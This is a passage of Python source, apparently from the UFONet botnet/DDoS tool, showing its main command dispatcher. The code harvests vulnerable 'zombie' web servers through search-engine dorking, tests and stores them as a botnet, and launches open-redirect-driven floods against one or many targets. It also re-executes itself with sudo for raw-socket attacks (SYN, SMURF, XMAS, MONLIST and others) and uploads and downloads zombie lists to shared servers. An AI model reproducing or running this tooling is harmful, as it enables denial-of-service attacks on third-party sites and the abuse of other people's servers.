  391. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  392. os.execlpe('sudo', *args)
  393. except:
  394. pass # keep running
  395. else:
  396. if not options.xrayps:
  397. options.xrayps = str("1-1024") # default scanning ports (1-1024)
  398. ports = options.xrayps
  399. try:
  400. portX, portY = ports.split('-')
  401. try:
  402. portX = int(portX)
  403. portY = int(portY)
  404. except:
  405. portX = 1
  406. portY = 1024
  407. print("[Error] [AI] [UFOSCAN] Something wrong with range of ports selected. Using by default: 1-1024...\n")
  408. except:
  409. portX = 1
  410. portY = 1024
  411. print("[Info] [AI] [UFOSCAN] Not any range of ports selected. Using by default: 1-1024...\n")
  412. self.banner()
  413. print("\n[AI] Analizing target to extract interesting information... Be patient!\n")
  414. print('='*22 + '\n')
  415. try:
  416. self.instance = UFOSCAN() # instance main class for scanning operations
  417. xray = self.instance.scanning(options.xray, portX, portY)
  418. except Exception as e:
  419. print ("[Error] [AI] Something wrong scanning... Not any data stream found! -> [Exiting!]\n")
  420. if DEBUG == True:
  421. traceback.print_exc()
  422. return
  423. # show code timeline
  424. if options.timeline:
  425. f = open(self.timeline_file, 'r')
  426. releases = f.readlines()
  427. f.close()
  428. self.banner()
  429. print("-> Code timeline:")
  430. print('='*44)
  431. print("-"*35)
  432. for r in releases:
  433. print(r.strip('\n'))
  434. print("-"*35)
  435. print('='*75, "\n")
  436. # print some examples
  437. if options.examples:
  438. f = open(self.examples_file, 'r')
  439. examples = f.readlines()
  440. f.close()
  441. self.banner()
  442. for e in examples:
  443. print(e.strip('\n'))
  444. # check EUID when running UFOSYN (root required for open 'raw sockets') / GUI will invoke 'sudo' directly
  445. if options.ufosyn:
  446. euid = self.checkeuid()
  447. if euid != 0:
  448. print("[Info] [AI] [Control] [UFOSYN] (--ufosyn) not started as root...\n")
  449. try:
  450. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  451. os.execlpe('sudo', *args)
  452. except:
  453. pass # keep running, but UFOSYN will fail
  454. # check EUID when running SPRAY (root required)
  455. if options.spray:
  456. euid = self.checkeuid()
  457. if euid != 0:
  458. print("[Info] [AI] [Control] [SPRAY] (--spray) not started as root...\n")
  459. try:
  460. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  461. os.execlpe('sudo', *args)
  462. except:
  463. pass # keep running, but SPRAY will fail
  464. # check EUID when running SMURF (root required)
  465. if options.smurf:
  466. euid = self.checkeuid()
  467. if euid != 0:
  468. print("[Info] [AI] [Control] [SMURF] (--smurf) not started as root...\n")
  469. try:
  470. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  471. os.execlpe('sudo', *args)
  472. except:
  473. pass # keep running, but SMURF will fail
  474. # check EUID when running XMAS (root required)
  475. if options.xmas:
  476. euid = self.checkeuid()
  477. if euid != 0:
  478. print("[Info] [AI] [Control] [XMAS] (--xmas) not started as root...\n")
  479. try:
  480. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  481. os.execlpe('sudo', *args)
  482. except:
  483. pass # keep running, but XMAS will fail
  484. # check EUID when running NUKE (root required)
  485. if options.nuke:
  486. euid = self.checkeuid()
  487. if euid != 0:
  488. print("[Info] [AI] [Control] [NUKE] (--nuke) not started as root...\n")
  489. try:
  490. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  491. os.execlpe('sudo', *args)
  492. except:
  493. pass # keep running, but NUKE will fail
  494. # check EUID when running TACHYON (root required)
  495. if options.tachyon:
  496. euid = self.checkeuid()
  497. if euid != 0:
  498. print("[Info] [AI] [Control] [TACHYON] (--tachyon) not started as root...\n")
  499. try:
  500. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  501. os.execlpe('sudo', *args)
  502. except:
  503. pass # keep running, but TACHYON will fail
  504. # check EUID when running MONLIST (root required)
  505. if options.monlist:
  506. euid = self.checkeuid()
  507. if euid != 0:
  508. print("[Info] [AI] [Control] [MONLIST] (--monlist) not started as root...\n")
  509. try:
  510. args = ['sudo', sys.executable] + sys.argv + [os.environ]
  511. os.execlpe('sudo', *args)
  512. except:
  513. pass # keep running, but MONLIST will fail
  514. # search for [Zombies] on search engines results (dorking)
  515. if options.search:
  516. zombies = []
  517. if options.engine:
  518. engine = options.engine
  519. else:
  520. engine = "duck" # default search engine
  521. try:
  522. self.banner()
  523. if not os.path.exists(self.humans_file) == True:
  524. f = open(self.humans_file, 'w')
  525. f.close()
  526. lf = open(self.humans_file, 'r')
  527. restored = lf.readlines()
  528. zombies_restored = len(restored)
  529. lf.close()
  530. lz = open(self.zombies_file, 'r')
  531. zombies_army = lz.readlines()
  532. for zombie in zombies_army:
  533. zombies.append(zombie) # add zombies from army to the zombies pool
  534. lz.close()
  535. if len(restored) > 0:
  536. print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
  537. if not self.options.forceyes:
  538. backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
  539. print('-'*25)
  540. else:
  541. backup_reply = "Y"
  542. if backup_reply == "n" or backup_reply == "N":
  543. print("\n[Info] [AI] Removing data stored and starting a new search...\n")
  544. os.remove(self.humans_file)
  545. zombies_restored = 0 # flush zombies restored
  546. print('-'*25 + "\n")
  547. else:
  548. print("\n[Info] [AI] Restoring data and starting a new search...\n")
  549. print('-'*25 + "\n")
  550. for zombie in restored:
  551. zombies.append(zombie) # add previous data to zombies pool
  552. if options.allengines:
  553. if options.ex_engine: # exclude some search engines manually
  554. exclude = options.ex_engine.split(",")
  555. for ex in exclude:
  556. ex = ex.lower()
  557. if ex in self.search_engines:
  558. if len(self.search_engines) == 1: # at least one should make it
  559. pass
  560. else:
  561. self.search_engines.remove(ex)
  562. for e in self.search_engines:
  563. engine = e
  564. print('='*44)
  565. print(("\n[AI] Searching for zombies using: "+engine+'\n'))
  566. print('='*44 + '\n')
  567. self.options.engine = engine
  568. try:
  569. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
  570. if zombies_chain != None:
  571. for zombie in zombies_chain:
  572. if zombie not in zombies: # evade possible repetitions
  573. zombies.append(zombie)
  574. except:
  575. if zombies: # backup all new zombies found to file in case of exception
  576. for zombie in zombies:
  577. if zombie+os.linesep not in restored: # only append new zombies found
  578. with open(self.humans_file, "a") as f:
  579. f.write(str(zombie+os.linesep))
  580. else:
  581. if restored:
  582. print('='*44)
  583. print(("\n[AI] Searching for zombies using: "+engine+"\n"))
  584. print('='*44 + '\n')
  585. if restored: # from restored file
  586. try:
  587. zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
  588. if zombies_chain != None:
  589. for zombie in zombies_chain:
  590. if zombie not in zombies: # evade possible repetitions
  591. zombies.append(zombie)
  592. except:
  593. if zombies: # backup all new zombies found to file in case of exception
  594. for zombie in zombies:
  595. if zombie+os.linesep not in restored: # only append new zombies found
  596. with open(self.humans_file, "a") as f:
  597. f.write(str(zombie+os.linesep))
  598. else:
  599. try:
  600. zombies = self.search_zombies(dork='', zombies_found=zombies)
  601. except:
  602. if zombies: # backup all new zombies found to file in case of exception
  603. for zombie in zombies:
  604. if zombie+os.linesep not in restored: # only append new zombies found
  605. with open(self.humans_file, "a") as f:
  606. f.write(str(zombie+os.linesep))
  607. total_restored = zombies_restored
  608. new_zombies = 0 # new zombies counter
  609. f = open(self.zombies_file, 'r')
  610. zz = f.readlines()
  611. f.close()
  612. zombies_found = []
  613. for z in zombies:
  614. if z.endswith(os.linesep):
  615. z = z.replace(os.linesep, "")
  616. if z not in zz and z+os.linesep not in zz:
  617. new_zombies = new_zombies + 1
  618. zombies_found.append(z)
  619. print('='*62)
  620. print("\n- Victims found:", len(zombies_found), "\n")
  621. print(" - Restored:", total_restored)
  622. print(" - Dorked:", abs(len(zombies_found) - total_restored), "\n")
  623. print('-'*32)
  624. print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
  625. print('='*62 + '\n')
  626. if len(zombies) > 0:
  627. if not self.options.forceyes:
  628. check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
  629. print('-'*25)
  630. else:
  631. check_backup_reply = "Y"
  632. if check_backup_reply == "n" or check_backup_reply == "N":
  633. if os.path.isfile(self.humans_file):
  634. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
  635. print("\n[Info] [AI] Temporal data correctly removed...\n")
  636. else:
  637. with open(self.humans_file, "w") as f:
  638. for z in zombies_found:
  639. if z.endswith(os.linesep):
  640. z = z.replace(os.linesep, "")
  641. if z not in zz or z+os.linesep not in zz:
  642. f.write(z+os.linesep)
  643. f.close()
  644. print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
  645. print('-'*25 + "\n")
  646. if new_zombies and new_zombies > 0:
  647. if not self.options.forceyes:
  648. check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
  649. print('-'*25 + "\n")
  650. else:
  651. check_url_link_reply = "Y"
  652. if check_url_link_reply == "n" or check_url_link_reply == "N":
  653. print("[AI] "+self.exit_msg+"\n")
  654. pass
  655. else:
  656. print("\n" + '='*44)
  657. test = self.testing(zombies_found)
  658. else:
  659. print("[Info] [AI] NOT any NEW possible zombies found -> [Exiting!]\n")
  660. except Exception:
  661. print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
  662. # search for [Zombies] from a list of [Dorks]
  663. if options.dorks:
  664. if options.engine:
  665. engine = options.engine
  666. else:
  667. engine = "duck" # default search engine
  668. try:
  669. dorks = self.extract_dorks()
  670. if not dorks:
  671. return
  672. zombies = []
  673. self.banner()
  674. if not os.path.exists(self.humans_file) == True:
  675. f = open(self.humans_file, 'w')
  676. f.close()
  677. lf = open(self.humans_file, 'r')
  678. restored = lf.readlines()
  679. zombies_restored = len(restored)
  680. lf.close()
  681. lz = open(self.zombies_file, 'r')
  682. zombies_army = lz.readlines()
  683. for zombie in zombies_army:
  684. zombies.append(zombie) # add zombies from army to the zombies pool
  685. lz.close()
  686. if len(restored) > 0:
  687. print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
  688. if not self.options.forceyes:
  689. backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
  690. print('-'*25)
  691. else:
  692. backup_reply = "Y"
  693. if backup_reply == "n" or backup_reply == "N":
  694. print("\n[Info] [AI] Removing data stored and starting a new search...\n")
  695. os.remove(self.humans_file)
  696. zombies_restored = 0 # flush zombies restored
  697. print('-'*25 + "\n")
  698. else:
  699. print("\n[Info] [AI] Restoring data and starting a new search...\n")
  700. print('-'*25 + "\n")
  701. for zombie in restored:
  702. zombies.append(zombie) # add previous data to zombies pool
  703. total_restored = zombies_restored
  704. if options.allengines:
  705. if options.ex_engine: # exclude some search engines manually
  706. exclude = options.ex_engine.split(",")
  707. for ex in exclude:
  708. ex = ex.lower()
  709. if ex in self.search_engines:
  710. if len(self.search_engines) == 1: # at least one should make it
  711. pass
  712. else:
  713. self.search_engines.remove(ex)
  714. for e in self.search_engines:
  715. engine = e
  716. print('='*44)
  717. print(("\n[AI] Searching for zombies using: ["+engine+ "] from a list of [Dorks]\n"))
  718. print('='*44 + '\n')
  719. self.options.engine = engine
  720. for dork in dorks:
  721. print('='*22)
  722. print("Dork:", dork)
  723. print('='*22 + '\n')
  724. try:
  725. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
  726. for zombie in dorked_zombies:
  727. if zombie not in zombies: # evade repetitions for zombies found
  728. zombies.append(zombie)
  729. if zombie+os.linesep not in restored: # only append new zombies found
  730. with open(self.humans_file, "a") as f:
  731. f.write(str(zombie+os.linesep))
  732. f.close()
  733. except:
  734. if zombies: # backup new zombies found on exception
  735. for zombie in zombies:
  736. if zombie+os.linesep not in restored: # only append new zombies found
  737. with open(self.humans_file, "a") as f:
  738. f.write(str(zombie+os.linesep))
  739. f.close()
  740. else:
  741. if restored:
  742. print('='*44)
  743. print(("\n[AI] Searching for zombies using: ["+ engine+ "] from a list of [Dorks]\n"))
  744. print('='*44 + '\n')
  745. for dork in dorks:
  746. print('='*22)
  747. print("Dork:", dork)
  748. print('='*22 + '\n')
  749. try:
  750. dorked_zombies = self.search_zombies(dork, zombies) # AI mode
  751. if dorked_zombies != None:
  752. for zombie in dorked_zombies:
  753. if zombie not in zombies: # evade repetitions for zombies found
  754. zombies.append(zombie)
  755. except:
  756. if zombies: # backup new zombies found on exception
  757. for zombie in zombies:
  758. if zombie+os.linesep not in restored: # only append new zombies found
  759. with open(self.humans_file, "a") as f:
  760. f.write(str(zombie+os.linesep))
  761. f.close()
  762. new_zombies = 0 # new zombies counter
  763. f = open(self.zombies_file, 'r')
  764. zz = f.readlines()
  765. f.close()
  766. zombies_found = []
  767. for z in zombies:
  768. if z.endswith(os.linesep):
  769. z = z.replace(os.linesep, "")
  770. if z not in zz and z+os.linesep not in zz:
  771. new_zombies = new_zombies + 1
  772. zombies_found.append(z)
  773. print('='*62)
  774. print("\n- Victims found:", len(zombies_found), "\n")
  775. print(" - Restored:", total_restored)
  776. print(" - Dorked:", len(zombies_found) - total_restored, "\n")
  777. print('-'*32)
  778. print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
  779. print('='*62 + '\n')
  780. if len(zombies_found) > 0:
  781. if not self.options.forceyes:
  782. check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
  783. print('-'*25)
  784. else:
  785. check_backup_reply = "Y"
  786. if check_backup_reply == "n" or check_backup_reply == "N":
  787. if os.path.isfile(self.humans_file):
  788. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
  789. print("\n[Info] [AI] Temporal data correctly removed...\n")
  790. else:
  791. with open(self.humans_file, "w") as f:
  792. for z in zombies_found:
  793. if z.endswith(os.linesep):
  794. z = z.replace(os.linesep, "")
  795. if z not in zz or z+os.linesep not in zz:
  796. f.write(z+os.linesep)
  797. f.close()
  798. print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
  799. print('-'*25 + "\n")
  800. if new_zombies and new_zombies > 0:
  801. if not self.options.forceyes:
  802. check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
  803. print('-'*25 + "\n")
  804. else:
  805. check_url_link_reply = "Y"
  806. if check_url_link_reply == "n" or check_url_link_reply == "N":
  807. print("[AI] "+self.exit_msg+"\n")
  808. pass
  809. else:
  810. print("\n" + '='*44)
  811. test = self.testing(zombies_found)
  812. else:
  813. print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
  814. except Exception:
  815. print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
  816. # auto-search for [Zombies] (dorks+all_engines+time -> to discover max new zombies)
  817. if options.autosearch:
  818. try:
  819. dorks = self.extract_dorks()
  820. except:
  821. print("\n[Info] [AI] Not any dork present at: 'botnet/dorks.txt' -> [Aborting!]\n")
  822. return
  823. engines_list = self.search_engines
  824. stop_flag = False # use a flag to establish an end
  825. try:
  826. self.banner()
  827. print("\n[AI] Searching automatically for [Zombies] (WARNING: this may take several time!)\n")
  828. print("[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n")
  829. print('-'*25 + "\n")
  830. zombies_found = []
  831. lz = open(self.zombies_file, 'r')
  832. zombies_army = lz.readlines()
  833. for zombie in zombies_army:
  834. zombies_found.append(zombie) # add zombies from army to the zombies found pool
  835. lz.close()
  836. if not os.path.exists(self.humans_file) == True:
  837. f = open(self.humans_file, 'w')
  838. f.close()
  839. lf = open(self.humans_file, 'r')
  840. restored = lf.readlines()
  841. zombies_restored = len(restored)
  842. lf.close()
  843. if len(restored) > 0:
  844. print("[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
  845. if not self.options.forceyes:
  846. backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
  847. print('-'*25)
  848. else:
  849. backup_reply = "Y"
  850. if backup_reply == "n" or backup_reply == "N":
  851. print("\n[Info] [AI] Removing data stored and starting a new (auto)search...\n")
  852. os.remove(self.humans_file)
  853. zombies_restored = 0 # flush zombies restored
  854. print('-'*25 + "\n")
  855. else:
  856. print("\n[Info] [AI] Restoring data and starting a new (auto)search...\n")
  857. print('-'*25 + "\n")
  858. for zombie in restored:
  859. zombies_found.append(zombie) # add previous data to zombies found pool
  860. total_restored = zombies_restored
  861. while stop_flag == False:
  862. if not os.path.exists(self.humans_file) == True:
  863. f = open(self.humans_file, 'w')
  864. f.close()
  865. lf = open(self.humans_file, 'r') # read it on each iteration to update changes
  866. restored = lf.readlines()
  867. lf.close()
  868. zombies_restored = len(restored)
  869. for e in engines_list:
  870. zombies_counter = 0 # use it also as (engine) flag
  871. engine = e
  872. self.options.engine = engine
  873. print('='*44 + '\n')
  874. print(("[AI] Searching for zombies using: "+engine+'\n'))
  875. print('='*44 + '\n')
  876. for dork in dorks:
  877. print('='*22)
  878. print("Dork:", dork)
  879. print('='*22 + '\n')
  880. try:
  881. dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode
  882. for zombie in dorked_zombies:
  883. if zombie not in zombies_found: # evade repetitions for zombies found
  884. zombies_found.append(zombie)
  885. if zombie+os.linesep not in restored: # only append new zombies found
  886. with open(self.humans_file, "a") as f:
  887. f.write(str(zombie+os.linesep))
  888. f.close()
  889. zombies_counter = zombies_counter + 1
  890. except:
  891. if zombies_found: # backup new zombies found on exception
  892. for zombie in zombies_found:
  893. if zombie+os.linesep not in restored: # only append new zombies found
  894. with open(self.humans_file, "a") as f:
  895. f.write(str(zombie+os.linesep))
  896. f.close()
  897. if zombies_counter == 0:
  898. print("[Info] [AI] NOT more NEW victims found (by the moment) using: "+engine+" -> [Discarding!]\n")
  899. print('-'*25 + "\n")
  900. engines_list.remove(engine) # remove not more results engine from search engines list
  901. if not engines_list: # if search engines empty, call return-exit routine
  902. print("[Info] [AI] Search engines aren't providing more results -> [Exiting!]\n")
  903. print('-'*25 + "\n")
  904. stop_flag = True # exit flag up
  905. new_zombies = 0 # new zombies counter
  906. f = open(self.zombies_file, 'r')
  907. zz = f.readlines()
  908. f.close()
  909. all_zombies_found = []
  910. for z in zombies_found:
  911. if z.endswith(os.linesep):
  912. z = z.replace(os.linesep, "")
  913. if z not in zz and z+os.linesep not in zz:
  914. new_zombies = new_zombies + 1
  915. all_zombies_found.append(z)
  916. print('='*62)
  917. print("\n- Victims found:", len(all_zombies_found), "\n")
  918. print(" - Restored:", total_restored)
  919. print(" - Dorked:", len(all_zombies_found) - total_restored, "\n")
  920. print('-'*32)
  921. print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
  922. print('='*62 + '\n')
  923. if len(zombies_found) > 0:
  924. if not self.options.forceyes:
  925. check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
  926. print('-'*25)
  927. else:
  928. check_backup_reply = "Y"
  929. if check_backup_reply == "n" or check_backup_reply == "N":
  930. if os.path.isfile(self.humans_file):
  931. os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
  932. print("\n[Info] [AI] Temporal data correctly removed...\n")
  933. else:
  934. with open(self.humans_file, "w") as f:
  935. for z in all_zombies_found:
  936. if z.endswith(os.linesep):
  937. z = z.replace(os.linesep, "")
  938. if z not in zz or z+os.linesep not in zz:
  939. f.write(z+os.linesep)
  940. f.close()
  941. print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
  942. print('-'*25 + "\n")
  943. if new_zombies and new_zombies > 0:
  944. if not self.options.forceyes:
  945. check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
  946. print('-'*25 + "\n")
  947. else:
  948. check_url_link_reply = "Y"
  949. if check_url_link_reply == "n" or check_url_link_reply == "N":
  950. print("[AI] "+self.exit_msg+"\n")
  951. pass
  952. else:
  953. print("\n" + '='*44)
  954. test = self.testing(all_zombies_found)
  955. else:
  956. print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
  957. except Exception:
  958. print ("[Error] [AI] Something wrong (auto)searching...\n")
  959. # test web 'zombie' servers -> show statistics
  960. if options.test:
  961. try:
  962. self.banner()
  963. zombies = self.extract_zombies()
  964. if not zombies:
  965. return
  966. test = self.testing(zombies)
  967. self.update_missions_stats() # update mothership missions stats
  968. except Exception:
  969. print ("\n[Error] [AI] Something wrong testing!\n")
  970. if DEBUG == True:
  971. traceback.print_exc()
  972. # test XML-'rpc' pingback vulnerable servers -> update list
  973. if options.testrpc:
  974. try:
  975. self.banner()
  976. rpcs = self.extract_rpcs()
  977. if not rpcs:
  978. return
  979. testrpc = self.testing_rpcs(rpcs)
  980. self.update_missions_stats() # update mothership missions stats
  981. except Exception:
  982. print ("\n[Error] [AI] Something wrong testing X-RPCs!\n")
  983. if DEBUG == True:
  984. traceback.print_exc()
  985. # check botnet searching for zombies offline
  986. if options.testoffline:
  987. try:
  988. self.banner()
  989. testbotnet = self.testing_offline()
  990. self.update_missions_stats() # update mothership missions stats
  991. except Exception:
  992. print ("\n[Error] [AI] Something wrong checking for offline [Zombies]!\n")
  993. if DEBUG == True:
  994. traceback.print_exc()
  995. # check ALL botnet status
  996. if options.testall:
  997. try:
  998. self.banner()
  999. test_all_botnet = self.testing_all()
  1000. self.update_missions_stats() # update mothership missions stats
  1001. except Exception:
  1002. print ("\n[Error] [AI] Something wrong testing ALL botnet status!\n")
  1003. if DEBUG == True:
  1004. traceback.print_exc()
  1005. # attack target -> exploit Open Redirect massively and conduct vulnerable servers to a single target
  1006. if options.target:
  1007. try:
  1008. self.banner()
  1009. zombies = self.extract_zombies()
  1010. if not zombies:
  1011. return
  1012. options.target = self.parse_url_encoding(options.target) # parse for proper url encoding
  1013. attack = self.attacking(zombies, options.target)
  1014. self.update_missions_stats() # update mothership missions stats
  1015. except Exception:
  1016. print ("\n[Error] [AI] Something wrong attacking!\n")
  1017. if DEBUG == True:
  1018. traceback.print_exc()
  1019. # attack a list of targets -> exploit Open Redirect massively and conduct vulnerable servers to multiple targets
  1020. if options.target_list:
  1021. try:
  1022. self.banner()
  1023. zombies = self.extract_zombies()
  1024. if not zombies:
  1025. return
  1026. targets = self.extract_target_list()
  1027. if not targets:
  1028. print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
  1029. return
  1030. self.options.forceyes = True # force-yes ON!
  1031. self.num_target_list = 0
  1032. print("\n[AI] Checking integrity of targets...\n")
  1033. for t in targets: # start of code block dedicated to: Guido van Rossum [23/12/2018]
  1034. if not t.startswith("http"): # discarded inmediately
  1035. print("[Info] [AI] [Control] " + str(t) + " -> [Discarding!]")
  1036. targets.remove(t) # ¿remove? invalid targets
  1037. print("")
  1038. c = 0
  1039. for target in targets:
  1040. if target == "":
  1041. c = c + 1
  1042. else:
  1043. self.num_target_list = self.num_target_list + 1
  1044. if c == len(targets):
  1045. print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
  1046. return # end of code block dedicated to: Guido van Rossum [23/12/2018]
  1047. else:
  1048. for target in targets:
  1049. self.options.target = self.parse_url_encoding(target) # parse for proper url encoding
  1050. target = self.options.target
  1051. print('='*55 + "\n")
  1052. print("[Info] [AI] Aiming: " + str(target) + " -> [OK!]\n")
  1053. print("="*55)
  1054. attack = self.attacking(zombies, target)
  1055. self.update_missions_stats() # update mothership missions stats (each target counts)
  1056. except Exception:
  1057. print ("\n[Error] [AI] Something wrong attacking to multiple targets!\n")
  1058. if DEBUG == True:
  1059. traceback.print_exc()
  1060. # inspect target -> inspect target's components sizes
  1061. if options.inspect:
  1062. try:
  1063. self.banner()
  1064. print("\n[AI] Inspecting target for local resources... to find the best place to attack... SSssh!\n")
  1065. print('='*22 + '\n')
  1066. self.instance = Inspector(self) # instance main class for inspection operations
  1067. inspection = self.instance.inspecting(options.inspect)
  1068. self.update_missions_stats() # update mothership missions stats
  1069. except Exception as e:
  1070. print ("\n[Error] [AI] Something wrong inspecting... Not any object found!\n")
  1071. if DEBUG == True:
  1072. traceback.print_exc()
  1073. return #sys.exit(2)
  1074. # abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.)
  1075. if options.abduction:
  1076. try:
  1077. self.banner()
  1078. print("\n[AI] Abducting target to extract interesting information... Be patient!\n")
  1079. print('='*22 + '\n')
  1080. self.instance = Abductor(self) # instance main class for abduction operations
  1081. abduction = self.instance.abducting(options.abduction)
  1082. self.update_missions_stats() # update mothership missions stats
  1083. except Exception as e:
  1084. print ("\n[Error] [AI] Something wrong abducting... Not any data stream found!\n")
  1085. if DEBUG == True:
  1086. traceback.print_exc()
  1087. return #sys.exit(2)
  1088. # attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking
  1089. if options.attackme:
  1090. self.mothership_id = self.mothership_id[:25] # truncating anti-formats ;-)
  1091. try:
  1092. self.banner()
  1093. print("\n[AI] Ordering [Zombies] to attack you for benchmarking ;-)\n")
  1094. print("[Warning] You are going to reveal your real IP to [Zombies]!\n")
  1095. if not self.options.forceyes:
  1096. update_reply = input("[AI] Do you want to continue? (Y/n)")
  1097. else:
  1098. update_reply = "Y"
  1099. if update_reply == "n" or update_reply == "N":
  1100. print("\n[Info] [AI] [Control] Aborting 'Attack-Me' test... -> [Exiting!]\n")
  1101. return
  1102. self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash
  1103. print("\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash)
  1104. print("\n[AI] Checking NAT/IP configuration:\n")
  1105. nat = self.check_nat()
  1106. f = open("alien", "w") # generate random alien worker
  1107. f.write(str(self.mothership_hash))
  1108. f.close()
  1109. if self.nat_error_flag == "ON":
  1110. return
  1111. zombies = self.extract_zombies()
  1112. if not zombies:
  1113. return
  1114. attackme = self.attackme(zombies)
  1115. self.update_missions_stats() # update mothership missions stats
  1116. except Exception as e:
  1117. print ("\n[Error] [AI] Something wrong redirecting [Zombies] against you...\n")
  1118. if DEBUG == True:
  1119. traceback.print_exc()
  1120. return #sys.exit(2)
  1121. # check/update for latest stable version
  1122. if options.update:
  1123. self.banner()
  1124. try:
  1125. print("\n[AI] Trying to update automatically to the latest stable version\n")
  1126. Updater()
  1127. except:
  1128. print("Not any .git repository found!\n")
  1129. print("="*30)
  1130. print("\nTo have working this feature, you should clone UFONet with:\n")
  1131. print("$ git clone %s" % self.GIT_REPOSITORY)
  1132. print("\nAlso you can try this other mirror:\n")
  1133. print("$ git clone %s" % self.GIT_REPOSITORY2 + "\n")
  1134. # launch GUI/Web interface
  1135. if options.web:
  1136. self.create_web_interface()
  1137. return
  1138. # generate [Blackhole] server to share [Zombies]
  1139. if options.blackhole is not None:
  1140. self.banner()
  1141. try:
  1142. blackhole_lib = os.path.abspath(os.path.join('core/tools')) # add [Blackhole] lib
  1143. sys.path.append(blackhole_lib)
  1144. from core.tools.blackhole import BlackHole
  1145. print("\n[AI] Initiating void generation sequence...\n")
  1146. print('='*22 + '\n')
  1147. app = BlackHole()
  1148. app.start()
  1149. while True: time.sleep(1)
  1150. except KeyboardInterrupt:
  1151. print("\n[AI] Terminating void generation sequence...\n")
  1152. app.collapse()
  1153. except Exception as e:
  1154. print("[Error] "+str(e))
  1155. print("\n[AI] Something was wrong generating [Blackhole]... -> [Aborting!]\n")
  1156. # create [Griger] server to share [Stats/Wargames/Messages]
  1157. if options.grider is not None:
  1158. self.banner()
  1159. try:
  1160. grider_lib = os.path.abspath(os.path.join('core/tools')) # add [Grider] lib
  1161. sys.path.append(grider_lib)
  1162. from core.tools.grider import Grider
  1163. print("\n[AI] Initiating void generation sequence...\n")
  1164. print('='*22 + '\n')
  1165. app = Grider()
  1166. app.start()
  1167. while True: time.sleep(1)
  1168. except KeyboardInterrupt:
  1169. print("\n[AI] Terminating void generation sequence...\n")
  1170. app.collapse()
  1171. except Exception as e:
  1172. print("[Error] "+str(e))
  1173. print("\n[AI] Something was wrong generating [Grider]... -> [Aborting!]\n")
  1174. # download list of [Zombies] from a [Blackhole] IP
  1175. if options.dip is not None:
  1176. options.download = True
  1177. self.blackhole = options.dip
  1178. # upload list of [Zombies] to a [Blackhole] IP
  1179. if options.upip is not None:
  1180. options.upload = True
  1181. self.blackhole = options.upip
  1182. # download list of [Zombies] from Community server [20/01/2020 OK!]
  1183. if options.download:
  1184. try:
  1185. self.banner()
  1186. if options.dip is not None:
  1187. print(("\n[AI] Downloading list of [Zombies] from [Private] server: "+self.blackhole+" ...\n"))
  1188. else:
  1189. print("\n[AI] Downloading list of [Zombies] from [Community] server ...\n")
  1190. print('='*22 + '\n')
  1191. download_list = self.downloading_list()
  1192. except Exception as e:
  1193. print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
  1194. return
  1195. # upload list of [Zombies] to Community server [20/01/2020 OK!]
  1196. if options.upload:
  1197. try:
  1198. self.banner()
  1199. if options.upip is not None:
  1200. print(("\n[AI] Uploading list of [Zombies] to [Private] server: "+self.blackhole+" ...\n"))
  1201. else:
  1202. print("\n[AI] Uploading list of [Zombies] to [Community] server ...\n")
  1203. print('='*22 + '\n')
  1204. upload_list = self.uploading_list()
  1205. except Exception as e:
  1206. print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
  1207. if DEBUG == True:
  1208. traceback.print_exc()
  1209. return #sys.exit(2)
  1210. # download list of [Zombies] from GitHub server [20/01/2020 OK!]
  1211. if options.download_github:
  1212. try:
  1213. self.banner()
  1214. print("\n[AI] Downloading list of [Zombies] from [GitHub] server ...\n")
  1215. print('='*22 + '\n')
  1216. download_github_list = self.downloading_github_list()
  1217. except Exception as e:
  1218. print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
  1219. return
  1220. # upload list of [Zombies] to GitHub server [20/01/2020 OK!]
